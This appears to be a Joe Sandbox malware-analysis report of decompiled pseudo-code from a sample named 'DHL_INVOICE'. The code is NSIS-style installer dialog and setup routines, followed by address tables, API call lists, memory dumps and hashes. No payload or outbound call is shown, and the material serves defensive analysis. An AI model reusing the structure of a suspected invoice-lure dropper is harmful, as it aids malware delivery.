                                                                            							_t146 = _t146 + (_t53 << 6);
                                                                            							 *0x40b014 = _t141;
                                                                            							_t55 =  *0x435a24;
                                                                            							if(_t141 == _t55) {
                                                                            								E00401533(1);
                                                                            								_t55 =  *0x435a24;
                                                                            								_t141 =  *0x40b014; // 0x0
                                                                            							}
                                                                            							if( *0x4349ec != 0 || _t141 >= _t55) {
                                                                            								break;
                                                                            							}
                                                                            							_push( *((intOrPtr*)(_t146 + 0x24)));
                                                                            							_push(0x445000);
                                                                            							_a12 =  *((intOrPtr*)(_t146 + 0x14));
                                                                            							E00405EBA();
                                                                            							_push( *((intOrPtr*)(_t146 + 0x20)));
                                                                            							_push(0xfffffc19);
                                                                            							E0040551A(_t137);
                                                                            							_push( *((intOrPtr*)(_t146 + 0x1c)));
                                                                            							_push(0xfffffc1b);
                                                                            							E0040551A(_t137);
                                                                            							_push( *((intOrPtr*)(_t146 + 0x28)));
                                                                            							_push(0xfffffc1a);
                                                                            							E0040551A(_t137);
                                                                            							_t142 = GetDlgItem(_t137, 3);
                                                                            							_t67 = _v32;
                                                                            							_v40 = _t142;
                                                                            							if( *0x435acc != 0) {
                                                                            								_t67 = _t67 & 0xfffffefd | 0x00000004;
                                                                            								 *(_t159 + 0x2c) = _t67;
                                                                            							}
                                                                            							ShowWindow(_t142, _t67 & 0x00000008); // executed
                                                                            							EnableWindow( *(_t159 + 0x28),  *(_t159 + 0x2c) & 0x00000100); // executed
                                                                            							EnableWindow( *0x42dd54,  *(_t159 + 0x2c) & 0x00000002); // executed
                                                                            							_t77 =  *(_t159 + 0x2c) & 0x00000004;
                                                                            							 *(_t159 + 0x34) = _t77;
                                                                            							EnableWindow( *0x42dd58, _t77);
                                                                            							if( *(_t159 + 0x2c) == 0) {
                                                                            								_push(1);
                                                                            							} else {
                                                                            								_push(0);
                                                                            							}
                                                                            							EnableMenuItem(GetSystemMenu(_t137, 0), 0xf060, ??);
                                                                            							SendMessageW( *(_t159 + 0x30), 0xf4, 0, 1);
                                                                            							if( *0x435acc == 0) {
                                                                            								_push( *0x42dd54);
                                                                            							} else {
                                                                            								SendMessageW(_t137, 0x401, 2, 0);
                                                                            								_push( *0x42dd58);
                                                                            							}
                                                                            							E00405503();
                                                                            							E00406B1A("Somatopleural Setup: Installing", E00405D1B());
                                                                            							_push( *((intOrPtr*)(_t146 + 0x18)));
                                                                            							_push(0x42bd48 + lstrlenW("Somatopleural Setup: Installing") * 2);
                                                                            							E00405EBA();
                                                                            							SetWindowTextW(_t137, "Somatopleural Setup: Installing"); // executed
                                                                            							_push(0);
                                                                            							if(E00401399( *((intOrPtr*)(_t146 + 8))) != 0 ||  *_t146 == 0) {
                                                                            								continue;
                                                                            							} else {
                                                                            								if( *(_t146 + 4) != 5) {
                                                                            									DestroyWindow( *0x4349dc); // executed
                                                                            									 *0x42dd4c = _t146;
                                                                            									if( *_t146 <= 0) {
                                                                            										L62:
                                                                            										_t58 =  *0x4349dc;
                                                                            										goto L63;
                                                                            									}
                                                                            									_t58 = CreateDialogParamW( *0x4349f4,  *_t146 +  *0x4349d4 & 0x0000ffff, _t137,  *(0x40b018 +  *(_t146 + 4) * 4), _t146); // executed
                                                                            									 *0x4349dc = _t58;
                                                                            									if(_t58 == 0) {
                                                                            										goto L63;
                                                                            									}
                                                                            									_push( *((intOrPtr*)(_t146 + 0x2c)));
                                                                            									_push(6);
                                                                            									E0040551A(_t58);
                                                                            									GetWindowRect(GetDlgItem(_t137, 0x3fa), _t159 + 0x10);
                                                                            									ScreenToClient(_t137, _t159 + 0x10);
                                                                            									SetWindowPos( *0x4349dc, 0,  *(_t159 + 0x20),  *(_t159 + 0x20), 0, 0, 0x15);
                                                                            									_push(0);
                                                                            									E00401399( *((intOrPtr*)(_t146 + 0xc)));
                                                                            									if( *0x4349ec != 0) {
                                                                            										goto L66;
                                                                            									}
                                                                            									ShowWindow( *0x4349dc, 8); // executed
                                                                            									E004054E8(0x405);
                                                                            									goto L62;
                                                                            								}
                                                                            								if( *0x435acc != 0) {
                                                                            									goto L66;
                                                                            								}
                                                                            								if( *0x435ac0 != 0) {
                                                                            									continue;
                                                                            								}
                                                                            								goto L66;
                                                                            							}
                                                                            						}
                                                                            						DestroyWindow( *0x4349dc);
                                                                            						 *0x4349f8 = 0;
                                                                            						EndDialog(_t137,  *0x42bd44);
                                                                            						goto L62;
                                                                            					} else {
                                                                            						if(_t139 != 1) {
                                                                            							L37:
                                                                            							if( *_t146 == 0) {
                                                                            								goto L66;
                                                                            							}
                                                                            							goto L38;
                                                                            						}
                                                                            						_push(0);
                                                                            						if(E00401399( *((intOrPtr*)(_t146 + 0x10))) == 0) {
                                                                            							goto L37;
                                                                            						}
                                                                            						SendMessageW( *0x4349dc, 0x40f, 0, 1);
                                                                            						return 0 |  *0x4349ec == 0x00000000;
                                                                            					}
                                                                            				} else {
                                                                            					if(_t143 != 0x47) {
                                                                            						if(_t143 != 5) {
                                                                            							if(_t143 != 0x40d) {
                                                                            								if(_t143 != 0x11) {
                                                                            									if(_t143 != 0x111) {
                                                                            										goto L29;
                                                                            									}
                                                                            									_t138 = _a12;
                                                                            									_t149 = _a12 & 0x0000ffff;
                                                                            									_a8 = _t149;
                                                                            									_t156 = GetDlgItem(_a4, _t149);
                                                                            									if(_t156 == 0) {
                                                                            										L16:
                                                                            										if(_t149 != 1) {
                                                                            											if(_t149 != 3) {
                                                                            												if(_t149 != 2) {
                                                                            													L28:
                                                                            													SendMessageW( *0x4349dc, 0x111, _a12, _a16);
                                                                            													goto L29;
                                                                            												}
                                                                            												if( *0x435acc == 0) {
                                                                            													if(E00401533(3) != 0) {
                                                                            														goto L30;
                                                                            													}
                                                                            													 *0x42bd44 = 1;
                                                                            													L26:
                                                                            													_push(0x78);
                                                                            													L27:
                                                                            													E00405958();
                                                                            													goto L30;
                                                                            												}
                                                                            												E00401533(_t149);
                                                                            												 *0x42bd44 = _t149;
                                                                            												goto L26;
                                                                            											}
                                                                            											if( *0x40b014 <= 0) {
                                                                            												goto L28;
                                                                            											}
                                                                            											_push(0xffffffff);
                                                                            											goto L27;
                                                                            										}
                                                                            										_push(1);
                                                                            										goto L27;
                                                                            									}
                                                                            									SendMessageW(_t156, 0xf3, 0, 0);
                                                                            									if(IsWindowEnabled(_t156) == 0) {
                                                                            										L66:
                                                                            										return 0;
                                                                            									}
                                                                            									_t149 = _a8;
                                                                            									goto L16;
                                                                            								}
                                                                            								SetWindowLongW(_t137, 0, 0);
                                                                            								return 1;
                                                                            							}
                                                                            							DestroyWindow( *0x4349dc);
                                                                            							_t58 = _a12;
                                                                            							 *0x4349dc = _t58;
                                                                            							L63:
                                                                            							if( *0x42bd40 == 0 && _t58 != 0) {
                                                                            								ShowWindow(_t137, 0xa); // executed
                                                                            								 *0x42bd40 = 1;
                                                                            							}
                                                                            							goto L66;
                                                                            						}
                                                                            						_t138 = _a12;
                                                                            						asm("sbb eax, eax");
                                                                            						ShowWindow( *0x42dd50,  ~(_t138 - 1) & _t143);
                                                                            						if(_t138 == 2 && (GetWindowLongW(_a4, 0xfffffff0) & 0x21010000) == 0x1000000) {
                                                                            							ShowWindow(_a4, 4);
                                                                            						}
                                                                            						goto L30;
                                                                            					} else {
                                                                            						SetWindowPos( *0x42dd50, _t137, 0, 0, 0, 0, 0x13);
                                                                            						L29:
                                                                            						_t138 = _a12;
                                                                            						L30:
                                                                            						return E0040575B(_t143, _t138, _a16);
                                                                            					}
                                                                            				}
                                                                            			}
























                                                                            0x00404f9b
                                                                            0x00404fa4
                                                                            0x00404fab
                                                                            0x00405133
                                                                            0x0040513d
                                                                            0x00405145
                                                                            0x00405149
                                                                            0x00405154
                                                                            0x00405159
                                                                            0x0040515b
                                                                            0x0040515d
                                                                            0x00405160
                                                                            0x00405165
                                                                            0x00405173
                                                                            0x00405180
                                                                            0x00405185
                                                                            0x00405187
                                                                            0x00405187
                                                                            0x0040518d
                                                                            0x00405199
                                                                            0x004051a1
                                                                            0x004051df
                                                                            0x004051e4
                                                                            0x004051e9
                                                                            0x004051e9
                                                                            0x004051ef
                                                                            0x004051f4
                                                                            0x004051f9
                                                                            0x004051fb
                                                                            0x00405201
                                                                            0x00405208
                                                                            0x0040520b
                                                                            0x00405210
                                                                            0x00405215
                                                                            0x00405215
                                                                            0x00405221
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040522f
                                                                            0x00405235
                                                                            0x0040523a
                                                                            0x0040523e
                                                                            0x00405243
                                                                            0x00405246
                                                                            0x0040524c
                                                                            0x00405251
                                                                            0x00405254
                                                                            0x0040525a
                                                                            0x0040525f
                                                                            0x00405262
                                                                            0x00405268
                                                                            0x00405276
                                                                            0x00405278
                                                                            0x0040527c
                                                                            0x00405286
                                                                            0x0040528d
                                                                            0x00405290
                                                                            0x00405290
                                                                            0x00405299
                                                                            0x004052ad
                                                                            0x004052c1
                                                                            0x004052cb
                                                                            0x004052d5
                                                                            0x004052d9
                                                                            0x004052e3
                                                                            0x004052e8
                                                                            0x004052e5
                                                                            0x004052e5
                                                                            0x004052e5
                                                                            0x004052f7
                                                                            0x00405308
                                                                            0x00405314
                                                                            0x0040532d
                                                                            0x00405316
                                                                            0x0040531f
                                                                            0x00405325
                                                                            0x00405325
                                                                            0x00405333
                                                                            0x00405343
                                                                            0x00405348
                                                                            0x0040535c
                                                                            0x0040535d
                                                                            0x00405368
                                                                            0x0040536e
                                                                            0x00405379
                                                                            0x00000000
                                                                            0x00405387
                                                                            0x0040538b
                                                                            0x004053b0
                                                                            0x004053b6
                                                                            0x004053be
                                                                            0x00405489
                                                                            0x00405489
                                                                            0x00000000
                                                                            0x00405489
                                                                            0x004053e4
                                                                            0x004053ea
                                                                            0x004053f1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004053f7
                                                                            0x004053fa
                                                                            0x004053fd
                                                                            0x00405414
                                                                            0x00405420
                                                                            0x00405439
                                                                            0x0040543f
                                                                            0x00405443
                                                                            0x0040544e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405458
                                                                            0x00405463
                                                                            0x00000000
                                                                            0x00405463
                                                                            0x00405393
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040539f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004053a5
                                                                            0x00405379
                                                                            0x00405470
                                                                            0x0040547c
                                                                            0x00405483
                                                                            0x00000000
                                                                            0x004051a3
                                                                            0x004051a5
                                                                            0x004051d7
                                                                            0x004051d9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004051d9
                                                                            0x004051a7
                                                                            0x004051b2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004051c1
                                                                            0x00000000
                                                                            0x004051cf
                                                                            0x00404fbd
                                                                            0x00404fc0
                                                                            0x00404fdf
                                                                            0x00405035
                                                                            0x00405054
                                                                            0x0040506f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405075
                                                                            0x00405079
                                                                            0x00405081
                                                                            0x0040508b
                                                                            0x0040508f
                                                                            0x004050b4
                                                                            0x004050b9
                                                                            0x004050c1
                                                                            0x004050d3
                                                                            0x00405106
                                                                            0x00405119
                                                                            0x00000000
                                                                            0x00405119
                                                                            0x004050dc
                                                                            0x004050f5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004050f7
                                                                            0x004050fd
                                                                            0x004050fd
                                                                            0x004050ff
                                                                            0x004050ff
                                                                            0x00000000
                                                                            0x004050ff
                                                                            0x004050df
                                                                            0x004050e4
                                                                            0x00000000
                                                                            0x004050e4
                                                                            0x004050ca
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004050cc
                                                                            0x00000000
                                                                            0x004050cc
                                                                            0x004050bb
                                                                            0x00000000
                                                                            0x004050bb
                                                                            0x0040509b
                                                                            0x004050aa
                                                                            0x004054aa
                                                                            0x00000000
                                                                            0x004054aa
                                                                            0x004050b0
                                                                            0x00000000
                                                                            0x004050b0
                                                                            0x0040505b
                                                                            0x00000000
                                                                            0x00405063
                                                                            0x0040503d
                                                                            0x00405043
                                                                            0x00405047
                                                                            0x0040548e
                                                                            0x00405495
                                                                            0x0040549e
                                                                            0x004054a4
                                                                            0x004054a4
                                                                            0x00000000
                                                                            0x00405495
                                                                            0x00404fe1
                                                                            0x00404ff0
                                                                            0x00404ffb
                                                                            0x00405000
                                                                            0x00405028
                                                                            0x00405028
                                                                            0x00000000
                                                                            0x00404fc2
                                                                            0x00404fd1
                                                                            0x0040511f
                                                                            0x0040511f
                                                                            0x00405123
                                                                            0x00000000
                                                                            0x00405129
                                                                            0x00404fc0

                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FD1
                                                                            • ShowWindow.USER32(?), ref: 00404FFB
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040500C
                                                                            • ShowWindow.USER32(?,00000004), ref: 00405028
                                                                            • GetDlgItem.USER32(?,00000001), ref: 0040514F
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00405159
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00405173
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004051C1
                                                                            • GetDlgItem.USER32(?,00000003), ref: 00405270
                                                                            • ShowWindow.USER32(00000000,?), ref: 00405299
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004052AD
                                                                            • KiUserCallbackDispatcher.NTDLL(?), ref: 004052C1
                                                                            • EnableWindow.USER32(?), ref: 004052D9
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052F0
                                                                            • EnableMenuItem.USER32(00000000), ref: 004052F7
                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00405308
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040531F
                                                                            • lstrlenW.KERNEL32(Somatopleural Setup: Installing,?,Somatopleural Setup: Installing,00000000), ref: 00405350
                                                                              • Part of subcall function 00405EBA: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406070
                                                                            • SetWindowTextW.USER32(?,Somatopleural Setup: Installing), ref: 00405368
                                                                              • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                              • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                            • DestroyWindow.USER32(?,00000000), ref: 004053B0
                                                                            • CreateDialogParamW.USER32(?,?,-00435A20), ref: 004053E4
                                                                              • Part of subcall function 0040551A: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405534
                                                                            • GetDlgItem.USER32(?,000003FA), ref: 0040540D
                                                                            • GetWindowRect.USER32(00000000), ref: 00405414
                                                                            • ScreenToClient.USER32(?,?), ref: 00405420
                                                                            • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405439
                                                                            • ShowWindow.USER32(00000008,?,00000000), ref: 00405458
                                                                              • Part of subcall function 004054E8: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA
                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040549E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                                                            • String ID: Somatopleural Setup: Installing
                                                                            • API String ID: 162979904-52397148
                                                                            • Opcode ID: 435f8b6443fc9593ff644d9f9dc2a8e4b29ac0017c4218abb197986b28d4ffe3
                                                                            • Instruction ID: ac036152562477463cd4b906f759de02b60d47e3f23a7c23d24dd845f532a47a
                                                                            • Opcode Fuzzy Hash: 435f8b6443fc9593ff644d9f9dc2a8e4b29ac0017c4218abb197986b28d4ffe3
                                                                            • Instruction Fuzzy Hash: 39D19071A00A11BFDB206F61ED49A6B7BA8FB84355F00053AF506B62F1C7389851DF9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 308 405a3e-405a59 call 4068e6 311 405a5b-405a66 GetUserDefaultUILanguage call 40661f 308->311 312 405a6d-405aa3 call 406977 308->312 315 405a6b 311->315 318 405aa5-405ab6 call 406977 312->318 319 405abb-405ac1 lstrcatW 312->319 317 405ac6-405aef call 40597f call 406638 315->317 325 405af5-405afa 317->325 326 405b87-405b8f call 406638 317->326 318->319 319->317 325->326 327 405b00-405b29 call 406977 325->327 332 405b91-405b98 call 405eba 326->332 333 405b9d-405bcb LoadImageW 326->333 327->326 334 405b2b-405b31 327->334 332->333 336 405c4a-405c52 call 401533 333->336 337 405bcd-405bf8 RegisterClassW 333->337 338 405b33-405b41 call 4065f6 334->338 339 405b44-405b52 lstrlenW 334->339 350 405d04-405d06 336->350 351 405c58-405c63 call 40597f 336->351 340 405c01-405c45 SystemParametersInfoW CreateWindowExW 337->340 341 405bfa-405bfc 337->341 338->339 344 405b54-405b62 lstrcmpiW 339->344 345 405b7a-405b82 call 406556 call 406b1a 339->345 340->336 346 405d07-405d0e 341->346 344->345 349 405b64-405b6e GetFileAttributesW 344->349 345->326 353 405b70-405b72 349->353 354 405b74-405b75 call 406d10 349->354 350->346 360 405c69-405c83 ShowWindow call 40619e 351->360 361 405ceb-405cec call 405864 351->361 353->345 353->354 354->345 366 405c85-405c8a call 40619e 360->366 367 405c8f-405ca0 GetClassInfoW 360->367 365 405cf1-405cf3 361->365 368 405cf5-405cfb 365->368 369 405d0f-405d11 call 401533 365->369 366->367 373 405ca2-405cb6 GetClassInfoW RegisterClassW 367->373 374 405cb8-405cdb DialogBoxParamW call 401533 367->374 368->350 370 405cfd-405cff call 401533 368->370 376 405d16 369->376 370->350 373->374 378 405ce0-405ce9 call 403cf8 374->378 376->376 378->346
                                                                            C-Code - Quality: 94%
                                                                            			E00405A3E() {
                                                                            				intOrPtr _v4;
                                                                            				intOrPtr _v8;
                                                                            				int _v12;
                                                                            				void _v16;
                                                                            				intOrPtr* _t21;
                                                                            				short _t22;
                                                                            				void* _t31;
                                                                            				void* _t33;
                                                                            				void* _t34;
                                                                            				int _t35;
                                                                            				int _t40;
                                                                            				int _t41;
                                                                            				int _t45;
                                                                            				int _t59;
                                                                            				short _t66;
                                                                            				WCHAR* _t69;
                                                                            				signed char _t73;
                                                                            				signed short _t77;
                                                                            				short _t81;
                                                                            				void* _t82;
                                                                            				void* _t84;
                                                                            				signed int _t86;
                                                                            				intOrPtr _t87;
                                                                            				WCHAR* _t92;
                                                                            				WCHAR* _t93;
                                                                            				WCHAR* _t94;
                                                                            
                                                                            				_t87 =  *0x435a10;
                                                                            				_t21 = E004068E6(2);
                                                                            				_t81 = 0x30;
                                                                            				_t97 = _t21;
                                                                            				if(_t21 == 0) {
                                                                            					_t22 = 0x78;
                                                                            					 *0x442002 = _t22;
                                                                            					L"1033" = _t81;
                                                                            					 *0x442004 = 0;
                                                                            					E00406977(_t81, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42bd48, 0);
                                                                            					__eflags =  *0x42bd48; // 0x53
                                                                            					if(__eflags == 0) {
                                                                            						E00406977(_t81, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M00409684, 0x42bd48, 0);
                                                                            					}
                                                                            					lstrcatW(L"1033", 0x42bd48);
                                                                            				} else {
                                                                            					_t77 =  *_t21(); // executed
                                                                            					E0040661F(L"1033", _t77 & 0x0000ffff);
                                                                            				}
                                                                            				E0040597F(_t97);
                                                                            				_t94 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring";
                                                                            				 *0x435adc = 0x10000;
                                                                            				 *0x435ac0 =  *0x435a0c & 0x00000020;
                                                                            				if(E00406638(_t97, _t94) != 0) {
                                                                            					L16:
                                                                            					if(E00406638(_t106, _t94) == 0) {
                                                                            						_push( *((intOrPtr*)(_t87 + 0x118)));
                                                                            						_push(_t94);
                                                                            						E00405EBA();
                                                                            					}
                                                                            					_t31 = LoadImageW( *0x4349f4, 0x67, 1, 0, 0, 0x8040); // executed
                                                                            					_t82 = _t31;
                                                                            					 *0x4349d8 = _t82;
                                                                            					if( *((intOrPtr*)(_t87 + 0x50)) == 0xffffffff) {
                                                                            						L22:
                                                                            						__eflags = E00401533(0);
                                                                            						if(__eflags != 0) {
                                                                            							L32:
                                                                            							_t33 = 2;
                                                                            							return _t33;
                                                                            						}
                                                                            						_t34 = E0040597F(__eflags);
                                                                            						__eflags =  *0x435ae0;
                                                                            						if( *0x435ae0 != 0) {
                                                                            							_t35 = E00405864(_t34, 0);
                                                                            							__eflags = _t35;
                                                                            							if(_t35 == 0) {
                                                                            								E00401533(1);
                                                                            								goto L20;
                                                                            							}
                                                                            							__eflags =  *0x4349ec;
                                                                            							if( *0x4349ec == 0) {
                                                                            								E00401533(2);
                                                                            							}
                                                                            							goto L32;
                                                                            						}
                                                                            						ShowWindow( *0x42dd50, 5); // executed
                                                                            						_t40 = E0040619E("RichEd20"); // executed
                                                                            						__eflags = _t40;
                                                                            						if(_t40 == 0) {
                                                                            							E0040619E("RichEd32");
                                                                            						}
                                                                            						_t41 = GetClassInfoW(0, L"RichEdit20W", 0x4349a0);
                                                                            						__eflags = _t41;
                                                                            						if(_t41 == 0) {
                                                                            							GetClassInfoW(0, L"RichEdit", 0x4349a0);
                                                                            							 *0x4349c4 = L"RichEdit20W";
                                                                            							RegisterClassW(0x4349a0);
                                                                            						}
                                                                            						_t45 = DialogBoxParamW( *0x4349f4,  *0x4349d4 + 0x00000069 & 0x0000ffff, 0, E00404F92, 0); // executed
                                                                            						E00403CF8(E00401533(5), 1);
                                                                            						return _t45;
                                                                            					} else {
                                                                            						_t92 = L"_Nb";
                                                                            						 *0x4349a4 = E00401000;
                                                                            						 *0x4349b0 =  *0x4349f4;
                                                                            						 *0x4349b4 = _t82;
                                                                            						 *0x4349c4 = _t92;
                                                                            						if(RegisterClassW(0x4349a0) != 0) {
                                                                            							SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                            							_t59 = _v8 - _v16;
                                                                            							__eflags = _t59;
                                                                            							 *0x42dd50 = CreateWindowExW(0x80, _t92, 0, 0x80000000, _v16, _v12, _t59, _v4 - _v12, 0, 0,  *0x4349f4, 0);
                                                                            							goto L22;
                                                                            						}
                                                                            						L20:
                                                                            						return 0;
                                                                            					}
                                                                            				} else {
                                                                            					_t86 =  *(_t87 + 0x48);
                                                                            					_t99 = _t86;
                                                                            					if(_t86 == 0) {
                                                                            						goto L16;
                                                                            					}
                                                                            					_t83 =  *0x435a38;
                                                                            					_t93 = 0x4339a0;
                                                                            					E00406977( *0x435a38, _t99,  *((intOrPtr*)(_t87 + 0x44)),  *0x435a38 + _t86 * 2, _t83 +  *(_t87 + 0x4c) * 2, 0x4339a0, 0);
                                                                            					_t66 =  *0x4339a0; // 0x43
                                                                            					if(_t66 == 0) {
                                                                            						goto L16;
                                                                            					}
                                                                            					_t84 = 0x22;
                                                                            					if(_t66 == _t84) {
                                                                            						_t93 = 0x4339a2;
                                                                            						 *((short*)(E004065F6(0x4339a2, _t84))) = 0;
                                                                            					}
                                                                            					_t69 =  &(_t93[lstrlenW(_t93) + 0xfffffffc]);
                                                                            					if(_t69 <= _t93 || lstrcmpiW(_t69, L".exe") != 0) {
                                                                            						L15:
                                                                            						E00406B1A(_t94, E00406556(_t93));
                                                                            						goto L16;
                                                                            					} else {
                                                                            						_t73 = GetFileAttributesW(_t93);
                                                                            						if(_t73 == 0xffffffff) {
                                                                            							L14:
                                                                            							E00406D10(_t93);
                                                                            							goto L15;
                                                                            						}
                                                                            						_t106 = _t73 & 0x00000010;
                                                                            						if((_t73 & 0x00000010) != 0) {
                                                                            							goto L15;
                                                                            						}
                                                                            						goto L14;
                                                                            					}
                                                                            				}
                                                                            			}





























                                                                            0x00405a45
                                                                            0x00405a4d
                                                                            0x00405a56
                                                                            0x00405a57
                                                                            0x00405a59
                                                                            0x00405a6f
                                                                            0x00405a76
                                                                            0x00405a85
                                                                            0x00405a91
                                                                            0x00405a97
                                                                            0x00405a9c
                                                                            0x00405aa3
                                                                            0x00405ab6
                                                                            0x00405ab6
                                                                            0x00405ac1
                                                                            0x00405a5b
                                                                            0x00405a5b
                                                                            0x00405a66
                                                                            0x00405a66
                                                                            0x00405ac6
                                                                            0x00405ad0
                                                                            0x00405ad8
                                                                            0x00405ae3
                                                                            0x00405aef
                                                                            0x00405b87
                                                                            0x00405b8f
                                                                            0x00405b91
                                                                            0x00405b97
                                                                            0x00405b98
                                                                            0x00405b98
                                                                            0x00405bae
                                                                            0x00405bb4
                                                                            0x00405bbb
                                                                            0x00405bcb
                                                                            0x00405c4a
                                                                            0x00405c50
                                                                            0x00405c52
                                                                            0x00405d04
                                                                            0x00405d06
                                                                            0x00000000
                                                                            0x00405d06
                                                                            0x00405c58
                                                                            0x00405c5d
                                                                            0x00405c63
                                                                            0x00405cec
                                                                            0x00405cf1
                                                                            0x00405cf3
                                                                            0x00405d11
                                                                            0x00000000
                                                                            0x00405d11
                                                                            0x00405cf5
                                                                            0x00405cfb
                                                                            0x00405cff
                                                                            0x00405cff
                                                                            0x00000000
                                                                            0x00405cfb
                                                                            0x00405c71
                                                                            0x00405c7c
                                                                            0x00405c81
                                                                            0x00405c83
                                                                            0x00405c8a
                                                                            0x00405c8a
                                                                            0x00405c9c
                                                                            0x00405c9e
                                                                            0x00405ca0
                                                                            0x00405ca9
                                                                            0x00405cac
                                                                            0x00405cb6
                                                                            0x00405cb6
                                                                            0x00405cd1
                                                                            0x00405ce2
                                                                            0x00000000
                                                                            0x00405bcd
                                                                            0x00405bd2
                                                                            0x00405bd8
                                                                            0x00405be2
                                                                            0x00405be7
                                                                            0x00405bed
                                                                            0x00405bf8
                                                                            0x00405c0a
                                                                            0x00405c26
                                                                            0x00405c26
                                                                            0x00405c45
                                                                            0x00000000
                                                                            0x00405c45
                                                                            0x00405bfa
                                                                            0x00000000
                                                                            0x00405bfa
                                                                            0x00405af5
                                                                            0x00405af5
                                                                            0x00405af8
                                                                            0x00405afa
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405b00
                                                                            0x00405b06
                                                                            0x00405b1b
                                                                            0x00405b20
                                                                            0x00405b29
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405b2d
                                                                            0x00405b31
                                                                            0x00405b34
                                                                            0x00405b41
                                                                            0x00405b41
                                                                            0x00405b4d
                                                                            0x00405b52
                                                                            0x00405b7a
                                                                            0x00405b82
                                                                            0x00000000
                                                                            0x00405b64
                                                                            0x00405b65
                                                                            0x00405b6e
                                                                            0x00405b74
                                                                            0x00405b75
                                                                            0x00000000
                                                                            0x00405b75
                                                                            0x00405b70
                                                                            0x00405b72
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405b72
                                                                            0x00405b52

                                                                            APIs
                                                                              • Part of subcall function 004068E6: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403810,0000000B), ref: 004068F4
                                                                              • Part of subcall function 004068E6: GetProcAddress.KERNEL32(00000000), ref: 00406910
                                                                            • GetUserDefaultUILanguage.KERNELBASE(00000002,00000000,761B3420,00000000,761B3170), ref: 00405A5B
                                                                              • Part of subcall function 0040661F: wsprintfW.USER32 ref: 0040662C
                                                                            • lstrcatW.KERNEL32(1033,Somatopleural Setup: Installing), ref: 00405AC1
                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\mnstring,1033,Somatopleural Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Somatopleural Setup: Installing,00000000,00000002,00000000), ref: 00405B45
                                                                            • lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\mnstring,1033,Somatopleural Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Somatopleural Setup: Installing,00000000), ref: 00405B5A
                                                                            • GetFileAttributesW.KERNEL32(Call), ref: 00405B65
                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\mnstring), ref: 00405BAE
